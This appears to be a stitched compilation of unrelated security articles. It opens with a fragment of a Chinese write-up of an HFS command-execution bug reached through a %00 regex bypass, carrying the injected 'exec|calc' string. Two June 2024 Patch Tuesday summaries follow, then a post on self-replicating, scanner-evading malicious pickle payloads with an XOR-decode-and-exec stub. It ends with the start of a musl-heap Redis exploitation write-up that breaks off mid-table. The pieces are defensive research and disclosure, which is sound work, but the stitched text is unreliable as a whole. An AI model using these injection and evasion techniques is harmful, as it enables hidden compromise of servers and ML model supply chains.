  v12 = &savedregs;
  v11 = &loc_52CF19;
  v10 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v10);
  __linkproc__ LStrAsg(v4, v14);

这步完成之后继续单步跟踪。

.text:00537063 loc_537063:                             ; CODE XREF: sub_535540+1B16j
.text:00537063                 mov     eax, [ebp+var_4]
.text:00537066                 mov     edx, offset aExec ; "exec"
.text:0053706B                 call    @@LStrCmp       ; __linkproc__ LStrCmp
.text:00537070                 jnz     short loc_537079
.text:00537072                 push    ebp
.text:00537073                 call    sub_5328E8

程序会在这里和exec做一次匹配,如果匹配成功,则会执行接下来的call sub_5328E8操作。

Breakpoint 3 hit
eax=010c3f78 ebx=00d07ad0 ecx=63657865 edx=00538970 esi=00000003 edi=00000006
eip=0053706b esp=0012edb4 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x13706b:
0053706b e8e8e7ecff      call    hfs_exe_unpacked_+0x5858 (00405858)
0:000> dc eax
010c3f78  63657865 253d0000 00263030 010c2960  exec..=%00&.`)..
010c3f88  00000002 00000009 63657865 6c61637c  ........exec|cal
010c3f98  00260063 010c2960 00000001 00000007  c.&.`)..........
010c3fa8  6165733f 00686372 00000000 0d3d7364  ?search.....ds=.
010c3fb8  616e650a 2d656c62 7263616d 793d736f  .enable-macros=y
010c3fc8  0a0d7365 2d657375 74737973 692d6d65  es..use-system-i
010c3fd8  736e6f63 7365793d 696d0a0d 696d696e  cons=yes..minimi
010c3fe8  742d657a 72742d6f 793d7961 0a0d7365  ze-to-tray=yes..
0:000> dc edx
00538970  63657865 00000000 ffffffff 00000014  exec............
00538980  a8b6e8c9 d8b55049 c4b5b7d6 c8b6d9cb  ....IP..........
00538990  c6d6decf 00000000 00000000 447a0000  ..............zD

可以看到,这里匹配的两个字符串指针eax和edx都是exec,也就是执行字符串匹配成功,接下来会进入sub_5328E8。

.text:00532AD9 loc_532AD9:                             ; CODE XREF: sub_5328E8+D7j
.text:00532AD9                 mov     eax, [ebp+arg_0]
.text:00532ADC                 push    eax
.text:00532ADD                 lea     edx, [ebp+var_2C]
.text:00532AE0                 mov     eax, [ebp+arg_0]
.text:00532AE3                 mov     eax, [eax-10h]
.text:00532AE6                 call    sub_52CE88
.text:00532AEB                 mov     eax, [ebp+var_2C]
.text:00532AEE                 mov     ecx, 5
.text:00532AF3                 mov     edx, [ebp+var_4]
.text:00532AF6                 call    sub_50CEC4

到达00532AF6地址位置,调用了sub_50CEC4函数,这个函数就是执行函数,来看一下伪代码。

char *__usercall sub_50CEC4@<eax>(_BYTE *a1@<eax>, int a2@<edx>, signed __int32 a3@<ecx>)
{
  nShowCmd = _InterlockedExchange((volatile signed __int32 *)&v46, a3);

      if ( v46
        && (v20 = nShowCmd,
            v21 = (const CHAR *)__linkproc__ LStrToPChar(),
            v22 = (const CHAR *)__linkproc__ LStrToPChar(),
            (unsigned int)ShellExecuteA(0, "open", v22, v21, 0, v20) > 0x20) )
      {

伪代码内部调用了ShellExecuteA函数,执行了任意命令。

总结一下整个过程,程序在对接收到的search函数进行处理的过程中,会进行一次正则表达式匹配转码,而这个过程没有对%00字符串进行处理,从而误认为遇到%00就结束了,从而利用这种方法绕过正则匹配,这样在后续分解过程中,可以用exec匹配到执行命令,执行任意命令。
```

Only one critical issue disclosed as part of Microsoft Patch Tuesday

Only one critical issue disclosed as part of Microsoft Patch Tuesday

Microsoft released its monthly security update Tuesday, disclosing 49 vulnerabilities across its suite of products and software.  

Of those there is only one critical vulnerability. Every other security issues disclosed this month is considered "important."

The lone critical security issue is CVE-2024-30080, a remote code execution vulnerability due to a use-after-free (UAF) issue in the HTTP handling function of Microsoft Message Queuing (MSMQ) messages.  

An adversary can send a specially crafted malicious MSMQ packet to an MSMQ server, potentially allowing them to perform remote code execution on the server side. Microsoft considers this vulnerability “more likely” to be exploited. 

There is also a remote code execution vulnerability in Microsoft Outlook, CVE-2024-30103. By successfully exploiting this vulnerability, an adversary can bypass Outlook registry block lists and enable the creation of malicious DLL (Dynamic Link Library) files. However, the adversary must be authenticated using valid Microsoft Exchange user credentials. Microsoft has also mentioned that the Outlook application Preview Pane is an attack vector. 

The company also disclosed a high-severity elevation of privilege vulnerability in Azure Monitor agent (CVE-2024-35254). An unauthenticated adversary with read access permissions can exploit this vulnerability by performing arbitrary file and folder deletion on a host where the Azure Monitor Agent is installed. However, this vulnerability does not disclose confidential information, but it could allow the adversary to delete data that could result in a denial of service. 

CVE-2024-30077, a high-severity remote code execution vulnerability in Microsoft OLE (Object Linking and Embedding), could also be triggered if an adversary tricks an authenticated user into attempting to connect to a malicious SQL server database via a connection driver (OLE DB or OLEDB). This could result in the database returning malicious data that could cause arbitrary code execution on the client.  

The Windows Wi-Fi driver also contains a high-severity remote code execution vulnerability, CVE-2024-30078. An adversary can exploit this vulnerability by sending a malicious networking packet to an adjacent system employing a Wi-Fi networking adapter, which could enable remote code execution. However, to exploit this vulnerability, an adversary must be near the target system to send and receive radio transmissions.  

CVE-2024-30063 and CVE-2024-30064 are high-severity elevation of privilege vulnerabilities in the Windows Distributed File System (DFS). An adversary who successfully exploits these vulnerabilities could gain elevated privileges through a vulnerable DFS client, allowing the adversary to locally execute arbitrary code in the kernel. However, an adversary must be locally authenticated to exploit these vulnerabilities by running a specially crafted application.  

Talos would also like to highlight a few more high-severity elevation of privilege vulnerabilities that Microsoft considers are “more likely” to be exploited. 

CVE-2024-30068, an elevation of privilege vulnerabilities in the Windows kernel, exists that could allow an adversary to gain SYSTEM-level privileges. By exploiting this vulnerability from a low-privilege AppContainer, an adversary can elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment. However, the adversary should first login to the system and then run a specially crafted application that could exploit the vulnerability and take control of an affected system.  

There are three high-severity elevation of privilege vulnerabilities — CVE-2024-30082, CVE-2024-30087 and CVE-2024-30091 — in Win32K kernel drivers that exist because of an out-of-bounds (OOB) issue. An adversary who exploits CVE-2024-30082 could gain SYSTEM privileges and exploiting CVE-2024-30087 and CVE-2024-30091, would gain the rights of the user that is running the affected application. Microsoft considers these vulnerabilities “more likely” to be exploited. 

CVE-2024-30088 and CVE-2024-30099 are two high-severity, and more “likely exploitable” elevation of privilege vulnerabilities in NT kernel drivers. Successful exploitation of these vulnerabilities would provide the local user and SYSTEM privileges to an adversary, respectively.  

Mskssrv, a Microsoft Streaming Service kernel driver, also contains two elevation of privilege vulnerabilities: CVE-2024-30089 and CVE-2024-30090. An adversary successfully exploiting these vulnerabilities could gain SYSTEM privileges.   

CVE-2024-30084 and CVE-2024-35250 are two more likely exploitable, high-severity elevation of privilege vulnerabilities in the Windows Kernel-Mode driver. An adversary could gain SYSTEM privileges by successfully exploiting these vulnerabilities. However, they must first win a race condition. 

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.  

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their rule set by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63581 - 63591, 63596 and 63597. There are also Snort 3 pre-processor rules 300937 - 300940.

The June 2024 Security Update Review

Somehow, we’ve made it to the sixth patch Tuesday of 2024, and Microsoft and Adobe have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:

Adobe Patches for June 2024

For June, Adobe released 10 patches addressing 165(!) CVEs in Adobe Cold Fusion, Photoshop,  Experience Manager, Audition, Media Encoder, FrameMaker Publishing Server, Adobe Commerce, Substance 3D Stager, Creative Cloud Desktop, and Acrobat Android. The fix for Experience Manager is by far the largest with a whopping 143 CVEs addressed. However, all but one of these bugs are simply cross-site scripting (XSS) vulnerabilities. The patch for Cold Fusion fixes two bugs, but neither are code execution bugs. That’s the same case for the patch addressing bugs in Audition. The fix for Media Encoder has a single OOB Read memory leak fixed. The update for Photoshop also has just one bug – a Critical-rated code execution issue. That’s also the story for the Substance 3D Stager patch.

The patch for FrameMaker Publishing Server has only two bugs, but one is a CVSS 10 and the other is a 9.8. If you’re using this product, this should be the first patch you test and deploy. The patch for Commerce should also be high on your test-and-deploy list as it corrects 10 bugs, including some Critical-rated code execution vulns. The patch for Creative Cloud Desktop fixes a single code execution bug. Finally, the patch for Acrobat Android corrects two security feature bypasses.

None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.

Microsoft Patches for June 2024

This month, Microsoft released 49 CVEs in Windows and Windows Components; Office and Office Components; Azure; Dynamics Business Central; and Visual Studio. If you include the third-party CVEs being documented this month, the CVE count comes to 58. A total of eight of these bugs came through the ZDI program, and that does include some of the cases reported during the Pwn2Own Vancouver contest in March.

Of the new patches released today, only one is rated Critical, and 48 are rated Important in severity. This release is another small release when compared to the monster that was April.

Only one of the CVEs listed today is listed as publicly known, but that’s actually just a third-party update that’s now being integrated into Microsoft products. Nothing is listed as being under active attack. Let’s take a closer look at some of the more interesting updates for this month, starting with the lone Critical-rated patch for this month:

-       CVE-2024-30080 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
This update receives a CVSS rating of 9.8 and would allow remote, unauthenticated attackers to execute arbitrary code with elevated privileges of systems where MSMQ is enabled. That makes this wormable between those servers, but not to systems where MSMQ is disabled. This is similar to the “QueueJumper” vulnerability from last year, but it’s not clear how many affected systems are exposed to the internet. While it is likely a low number, now would be a good time to audit your networks to ensure TCP port 1801 is not reachable.  

-       CVE-2024-30103 – Microsoft Outlook Remote Code Execution Vulnerability
This patch corrects a bug that allows attackers to bypass Outlook registry block lists and enable the creation of malicious DLL files. While not explicitly stated, attackers would likely then use the malicious DLL files to perform some form of DLL hijacking for further compromise. The good news here is that the attacker would need valid Exchange credentials to perform this attack. The bad news is that the exploit can occur in the Preview Pane. Considering how often credentials end up being sold in underground forums, I would not ignore this fix.  

-       CVE-2024-30078 – Windows Wi-Fi Driver Remote Code Execution Vulnerability
This vulnerability allows an unauthenticated attacker to execute code on an affected system by sending the target a specially crafted network packet. Obviously, the target would need to be in Wi-Fi range of the attacker and using a Wi-Fi adapter, but that’s the only restriction. Microsoft rates this as “exploitation less likely” but considering it hits every supported version of Windows, it will likely draw a lot of attention from attackers and red teams alike.

Here’s the full list of CVEs released by Microsoft for June 2024:

CVE Title Severity CVSS Public Exploited Type
CVE-2024-30080 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability Critical 9.8 No No RCE
CVE-2024-35255 Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-35254 † Azure Monitor Agent Elevation of Privilege Vulnerability Important 7.1 No No EoP
CVE-2024-37325 † Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability Important 9.8 No No EoP
CVE-2024-35252 Azure Storage Movement Client Library Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-30070 DHCP Server Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-29187 * GitHub: CVE-2024-29187 WiX Burn-based bundles are vulnerable to binary hijack when run as SYSTEM Important 7.3 No No EoP
CVE-2024-35253 Microsoft Azure File Sync Elevation of Privilege Vulnerability Important 4.4 No No EoP
CVE-2024-35263 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability Important 5.7 No No Info
CVE-2024-35248 Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2024-35249 Microsoft Dynamics 365 Business Central Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30072 Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30104 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30101 Microsoft Office Remote Code Execution Vulnerability Important 7.5 No No RCE
CVE-2024-30102 Microsoft Office Remote Code Execution Vulnerability Important 7.3 No No RCE
CVE-2024-30103 Microsoft Outlook Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30100 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30097 Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30089 Microsoft Streaming Service Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30090 Microsoft Streaming Service Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2023-50868 * MITRE: CVE-2023-50868 NSEC3 closest encloser proof can exhaust CPU Important 7.5 Yes No DoS
CVE-2024-29060 Visual Studio Elevation of Privilege Vulnerability Important 6.7 No No EoP
CVE-2024-30052 Visual Studio Remote Code Execution Vulnerability Important 4.7 No No RCE
CVE-2024-30082 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30087 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30091 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30085 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30076 Windows Container Manager Service Elevation of Privilege Vulnerability Important 6.8 No No EoP
CVE-2024-30096 Windows Cryptographic Services Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-30063 Windows Distributed File System (DFS) Remote Code Execution Vulnerability Important 6.7 No No RCE
CVE-2024-30064 Windows Kernel Elevation of Privilege Vulnerability Important 8.8 No No EoP
CVE-2024-30068 Windows Kernel Elevation of Privilege Vulnerability Important 8.8 No No EoP
CVE-2024-30088 Windows Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30099 Windows Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-35250 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30084 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30074 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-30075 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-30077 Windows OLE Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-35265 Windows Perception Service Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30069 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 4.7 No No Info
CVE-2024-30094 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30095 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30083 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-30062 Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30093 Windows Storage Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2024-30065 Windows Themes Denial of Service Vulnerability Important 5.5 No No DoS
CVE-2024-30078 Windows Wi-Fi Driver Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30086 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30066 Winlogon Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-30067 WinLogon Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-5493 * Chromium: CVE-2024-5493 Heap buffer overflow in WebRTC High N/A No No RCE
CVE-2024-5494 * Chromium: CVE-2024-5494 Use after free in Dawn High N/A No No RCE
CVE-2024-5495 * Chromium: CVE-2024-5495 Use after free in Dawn High N/A No No RCE
CVE-2024-5496 * Chromium: CVE-2024-5496 Use after free in Media Session High N/A No No RCE
CVE-2024-5497 * Chromium: CVE-2024-5497 Out of bounds memory access in Keyboard Inputs High N/A No No RCE
CVE-2024-5498 * Chromium: CVE-2024-5498 Use after free in Presentation API High N/A No No RCE
CVE-2024-5499 * Chromium: CVE-2024-5499 Out of bounds write in Streams API High N/A No No RCE

* Indicates this CVE had been released by a third party and is now being included in Microsoft releases.

† Indicates further administrative actions are required to fully address the vulnerability.

 

Looking at the other fixes addressing code execution bugs, there are a couple that stand out. In addition to the Wi-Fi bug above, there are two similar bugs in the Link Layer Topology Discovery Protocol with similar exploit vectors. The difference is that for these two bugs, the target needs to be running the Network Map functionality for the attack to succeed. There are several “open-and-own” type vulnerabilities getting patched. The one to look out for would be the Office bug that states, “The Preview Pane is an attack vector, but additional user interaction is required.” It’s not clear how that would manifest. The exploit for DFS requires an adjacent attacker to already be executing code on a target, which reads more like an EoP to me. The OLE bug requires connecting to a malicious SQL server. The bug in the Speech Application Programming Interface (SAPI) requires a user to click a link to connect to the attacker’s server. Lastly, the code execution bug in Dynamics 365 requires authentication, which again sounds more like an EoP, but it also states no user interaction is required. It’s an odd write-up that implies it’s unlikely to be exploited in the wild.

More than half of this month’s release corrects privilege escalation bugs, but the majority of these lead to SYSTEM-level code execution if an authenticated user runs specially crafted code. Other privilege escalation bugs would allow the attacker to get to the level of the running application. The bugs in Winlogon are somewhat intriguing as they could allow an attacker to replace valid file content with specially crafted file content. One of the kernel bugs could be used for a container escape. The bug in the Perception Service could allow elevation to the “NT AUTHORITY\LOCAL SERVICE” account. The vulnerability in Visual Studio requires an attacker to create a malicious extension. An authenticated user would then need to create a Visual Studio project that uses that extension. If they manage all of that, it would lead to admin privileges.

The bug in Azure Identity Libraries and Microsoft Authentication Library allows attackers to read any file on the target with SYSTEM privileges. The privilege escalation in Azure Monitor Agent could let attackers delete files and folders. If you’ve disabled Automatic Extension Upgrades, you’ll need to perform a manual update to ensure the Monitor Agent is at the latest version. Speaking of extra actions, the bug in the Azure Science Virtual Machine (DSVM) requires you to upgrade your DSVM to Ubuntu 20.04. If you’re not familiar with this procedure, Microsoft provides this article for guidance. Attackers who exploit this bug could gain access to user credentials, which would allow them to impersonate authorized users.

There are only three information disclosure bugs receiving fixes this month and only one results in info leaks consisting of unspecified memory contents. The bug in the on prem version of Dynamics 365 could allow an attacker to exfiltrate all the data accessible to the logged-on user. The vulnerability in the Cryptographic Services could disclose sensitive information such as KeyGuard (KG) keys, which are intended to be per-boot and used to protect sensitive data. If an attacker could potentially use these to decrypt anything encrypted with those keys.

The final bugs for June address Denial-of-Service (DoS) vulnerabilities in Windows and Azure components. Unfortunately, Microsoft provides no additional information about these bugs and how they would manifest on affected systems. They do note the DoS in the DHCP Server does not affect those who have configured failover for their DHCP setup.

There are no new advisories in this month’s release.

Looking Ahead

The next Patch Tuesday of 2024 will be on July 9, and I’ll return with details and patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

Exploiting ML models with pickle file attacks: Part 2

By Boyan Milanov

In part 1, we introduced Sleepy Pickle, an attack that uses malicious pickle files to stealthily compromise ML models and carry out sophisticated attacks against end users. Here we show how this technique can be adapted to enable long-lasting presence on compromised systems while remaining undetected. This variant technique, which we call Sticky Pickle, incorporates a self-replicating mechanism that propagates its malicious payload into successive versions of the compromised model. Additionally, Sticky Pickle uses obfuscation to disguise the malicious code to prevent detection by pickle file scanners.

Making malicious pickle payloads persistent

Recall from our previous blog post that Sleepy Pickle exploits rely on injecting a malicious payload into a pickle file containing a packaged ML model. This payload is executed when the pickle file is deserialized to a Python object, compromising the model’s weights and/or associated code. If the user decides to modify the compromised model (e.g., fine-tuning) and then re-distribute it, it will be serialized in a new pickle file that the attacker does not control. This process will likely render the exploit ineffective.

To overcome this limitation we developed Sticky Pickle, a self-replication mechanism that wraps our model-compromising payload in an encapsulating, persistent payload. The encapsulating payload does the following actions as it’s executed:

    1. Find the original compromised pickle file being loaded on the local filesystem.
    2. Open the file and read the encapsulating payload’s bytes from disk. (The payload cannot access them directly via its own Python code.)
    3. Hide its own bytecode in the object being unpickled under a predefined attribute name.
    4. Hook the pickle.dump() function so that when an object is re-serialized, it:
      • Serializes the object using the regular pickle.dump() function.
      • Detects that the object contains the bytecode attribute.
      • Manually injects the bytecode in the new Pickle file that was just created.

Figure 1: Persistent payload in malicious ML model files

With this technique, malicious pickle payloads automatically spread to derivative models without leaving a trace on the disk outside of the infected pickle file. Moreover, the ability to hook any function in the Python interpreter allows for other attack variations as the attacker can access other local files, such as training datasets or configuration files.

Payload obfuscation: Going under the radar

Another limitation of pickle-based exploits arises from the malicious payload being injected directly as Python source code. This means that the malicious code appears in plaintext in the Pickle file. This has several drawbacks. First, it is possible to detect the attack with naive file scanning and a few heuristics that target the presence of significant chunks of raw Python within Pickle files. Second, it’s easy for security teams to identify the attack and its intent just by looking at it.

We developed a payload obfuscation and encoding method that overcomes these limitations and makes payload detection much harder. Starting with our original payload consisting of code that compromises the pickled ML model, we modify it in two ways.

First, we obfuscate the payload by compiling it into a Python code object and serializing it into a string with the marshal library. This lets us inject this serialized payload string into the pickle file, followed by a special bytecode sequence. When executed, this special sequence calls marshal.loads() on the string to reconstruct the code object of the payload and execute it. This makes the payload completely unreadable to scanners or human inspection as it is injected as compiled Python bytecode instead of source code.

Second, we use a simple XOR encoding to vary the payload in every infected file. Instead of consisting of only the original model-compromising code, the XORed payload contains the XOR-encoded Python source of the original payload and a decoding and execution stub similar to this:

def compromise_model(model):
    # The string of the XOR-encoded python payload source code
    encoded_payload = 
    # This line decodes the payload and executes it
    exec(bytearray(b ^ 0x{XOR_KEY:X} for b in encoded_payload))
    return model

Since the obfuscation key can take any value and is hardcoded in the decoding stub, this method complements the persistence feature by allowing attackers to write a payload that generates a new obfuscation key upon reinjection in a new pickle file. This results in different Python payloads, code objects, and final pickle payloads being injected into compromised files, while the malicious behavior remains unchanged.

Figure 2: Obfuscation of the Python payload before injection in a pickle file

Figure 2 shows how this obfuscation method completely hides the malicious payload within the file. Automated tools or security analysts scanning the file would see only:

  1. The raw bytes of the Python payload that was compiled and then marshaled. It is difficult, if not impossible, to interpret these bytes and flag them as dangerous with static scanning.
  2. The pickle sequence that calls marshal.loads(). This is a common pattern also found in benign pickle files and thus is not sufficient to alert users about potential malicious behavior.

When a pickle file containing the obfuscated payload is loaded, the payload stages are executed in the following order, illustrated in figure 3:

  1. The malicious pickle opcodes load the raw bytes of the serialized code object, then reconstruct the Python code object using marshal.load(), and finally execute the code object.
  2. The code object is executed and decodes the XOR-encoded Python source code of the original payload.
  3. The decoded original payload code is executed and compromises the loaded ML model.

Figure 3: Overview of execution stages of the obfuscated payload

Sealing the lid on pickle

These persistence and evasion techniques show the level of sophistication that pickle exploits can achieve. Expanding on the critical risks we demonstrated in part one of this series, we’ve seen how a single malicious pickle file can:

  • Compromise other local pickle files and ML models.
  • Evade file scanning and make manual analysis significantly harder.
  • Make its payload polymorphic and spread it under an ever-changing form while maintaining the same final stage and end goal.

While these are only examples among other possible attack improvements, persistence and evasion are critical aspects of pickle exploits that, to our knowledge, have not yet been demonstrated.

Despite the risks posed by pickle files, we acknowledge that It will be a long-term effort for major frameworks of the ML ecosystem to move away from them. In the short-term, here are some action steps you can take to eliminate your exposure to these issues:

  • Avoid using pickle files to distribute serialized models.
  • Adopt safer alternatives to pickle files such as HuggingFace’s SafeTensors.
  • If you must use pickle files, scan them with our very own Fickling to detect pickle-based ML attacks.

Long-term, we are continuing our efforts to drive the ML industry to adopt secure-by-design technologies. If you want to learn more about our contributions, check out our awesome-ml-security and ml-file-formats Github repositories and our recent responsible disclosure of a critical GPU vulnerability called Leftover Locals!

Acknowledgments

Thanks to our intern Russel Tran for their hard work on pickle payload obfuscation and optimization.

Pumping Iron on the Musl Heap – Real World CVE-2022-24834 Exploitation on an Alpine mallocng Heap

This post is about exploiting CVE-2022-24834 against a Redis
container running on Alpine
Linux
. CVE-2022-24834 is a vulnerability affecting the Lua cjson
module in Redis servers <=7.0.11. The bug is an integer overflow that
leads to a large copy of data, approximately 350MiB.

A colleague from NCC Group wanted to exploit this bug but found that
the public exploits didn’t work. This was ultimately due to those
exploits being written to target Ubuntu or similar distros, which use
the GNU libc library.
The target in our case was Alpine 13.8, which uses musl libc 1.2.4. The important
distinction here is that GNU libc uses the ptmalloc2 heap allocator, and
musl 1.2.4 uses its own custom allocator called mallocng. This resulted
in some interesting differences during exploitation, which I figured I
would document since there’s not a lot of public information about
targeting the musl heap.

I highly recommend reading Ricerca Security’s original writeup,
which goes into depth about the vulnerability and how they approached
exploitation on ptmalloc2. Conviso Lab’s has a README.md that
describes some improvements that they made, which is also worth a look.
There are quite a few differences between exploitation on ptmalloc2 and
mallocng, which I’ll explain as I go. I’ll try not to repeat the details
that previous research has already provided but rather focus on the
parts that differed for mallocng.

Finally, I want to note that I am not attacking the musl mallocng
allocator by corrupting its metadata, but rather I’m doing Lua-specific
exploitation on the mallocng heap, mimicking the strategy done by the
original exploit.

Lua 5.1

As the previous articles covered Lua internals in detail, I won’t
repeat that information here. Redis uses Lua 5.1, so it’s important to
refer to the specific version when reading, as Lua has undergone
significant changes across different releases. These changes include
structure layouts and the garbage collection algorithm utilized.

I would like to highlight that Lua utilizes Tagged Values to
represent various internal types such as numbers and tables. The
structure is defined as follows:

/*
** Tagged Values
*/

#define TValuefields                                                           \
    Value value;                                                               \
    int   tt

typedef struct lua_TValue {
    TValuefields;
} TValue;

In this structure, tt denotes the type, and
value can either be an inline value or a pointer depending
on the associated type. In Lua, a Table serves as the
primary storage type, akin to a dictionary or list in Python. It
contains an array of TValue structures. For simple types
like integers, value is used directly. However, for more
complex types like nested tables, value acts as a pointer.
For further implementation details, please refer to Lua’s
lobject.h file or the aforementioned articles.

During debugging, I discovered the need to inspect Lua 5.1 objects.
The Alpine redis-server target did not include symbols for
the static Lua library. To address this, I compiled my own version of
Lua and filtered out all function symbols to only access the structure
definitions easily. This was achieved by identifying and stripping out
all FUNC symbols using readelf -Ws and
objcopy --strip-symbol.

Additionally, I came across the GdbLuaExtension,
which offers pretty printers and other functionalities for analyzing Lua
objects, albeit supporting version 5.3 only. I made some minor
modifications
to enable its compatibility with Lua 5.1. These
changes enabled features like pretty printers for tables, although I
didn’t conduct exhaustive testing on the required functionalities.

This method provides a clearer analysis of objects like a
Table, presenting information in a more readable format
compared to a hexdump.

(gdb) p/x *(Table *) 0x7ffff7a05100
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffaf9ef620 <lua_table^> 0x7ffff4a76322,
  [2] = (TValue *) 0x7fffaf9ef630 <lua_table^> 0x7ffff7a051a0,
  [3] = (TValue *) 0x7fffaf9ef640 <lua_table^> 0x7ffff7a051f0,
  [4] = (TValue *) 0x7fffaf9ef650 <lua_table^> 0x7ffff7a05290,
  [5] = (TValue *) 0x7fffaf9ef660 <lua_table^> 0x7ffff7a052e0,

The Table we printed shows an array of
TValue structures, and we can see that each
TValue in our table is referencing another table.

Musl’s Next
Generation Allocator – aka mallocng

On August 4, 2020,
musl 1.2.1 shipped a new heap algorithm called “mallocng”. This
allocator has received some good quality research in the past,
predominantly focused on CTF challenge exploitation. I didn’t find any
real-world exploitation examples, but if someone knows of some, please
let me know and I’ll update the article.

The mallocng allocator is slab-based and organizes fixed-sized
allocations (called slots) on multi-page slabs (called
groups). In general, groups are mmap()-backed.
However, groups containing small slots may actually be less than a size
of a page, in which case the group is actually just a larger fixed-sized
slot on a larger group. The allocator not using brk() is an
important detail as we will see later. The fixed size for a given group
is referred to as the group’s stride.

The mallocng allocator seems to be designed with security in mind,
mixing a combination of in-band metadata that contains some cookies,
with predominantly out-of-band metadata which is stored in slots on
dedicated group mappings that are prefixed with guard pages to prevent
corruption from linear overflows.

As I’m not actually going to be exploiting the allocator internals
itself, I won’t go into too much detail about the data structures. I
advise you to read pre-existing articles, which you can find in the
resource section.

There’s a useful gdb plugin called muslheap developed by
xf1les, which I made a lot of use of. xf1les also has an associated blog
post
which is worth reading. At the time of writing, I have a PR open to add
this functionality to pwndbg, and hopefully will have time add some more
functionality to it afterwards.

There is one particularly interesting aspect of the allocator that I
want to go over, which is that it can adjust the starting offset of
slots inside a group across subsequent allocations, using a value it
calls the cycling offset. It only does so if the overhead of a given
slot inside the fixed size has a large enough remainder such that the
offset can be adjusted. Interestingly, in this case, because the slot we
are working in is the 0x50-stride group, and the Table
structure is 0x48 bytes, this cycling offset doesn’t apply. Since I
narrowly avoided having to deal with this, and originally thought I
would have to, I’ll still take a moment to explain what the mitigation
actually is for and what it looks like in practice.

mallocng Cycling Offset

The cycling offset is a technique used to mitigate double frees,
although it can have a negative effect on other exploitation scenarios
as well. It works by adjusting the offset of the user data part of an
allocation each time a chunk is used, wrapping back to the beginning
once the offset is larger than the slack space. The offset starts at 1
and increments each time the chunk is reused.

The idea behind mitigating a double free is that if a chunk is used
and then freed, and then re-used, the offset used for the second
allocation will not be the same as the first time, due to cycling. Then,
when it is double freed, that free will detect some in-band metadata
anomaly and fail.

The allocator goes about this offset cycling by abusing the fact that
groups have fixed-sized slots, and often the user data being allocated
will not fill up the entire space of the slot, resulting in some slack
space. If the remaining slack space in the slot is large enough, which
is calculated by subtracting both the size of the user data and the
required in-line metadata, then there are actually two in-line metadata
blocks used inside a slot. One contains an offset used to indicate the
actual start of the user data, and that user data will still have some
metadata prefixed before it.

The offset calculation is done in the enframe()
function in mallocng. Basically, each time a slot is allocated, the
offset is increased, and will wrap back around when it exceeds the size
of the slack.

To demonstrate what the cycling offset looks like in practice, I will
focus on larger-than-Table stride groups, that have enough
slack such that the cycling offset will be used. If we review what the
stride sizes are, we see:

sizeclass stride sizeclass stride sizeclass stride sizeclass stride
1 0x20 13 0x140 25 0xaa0 37 0x5540
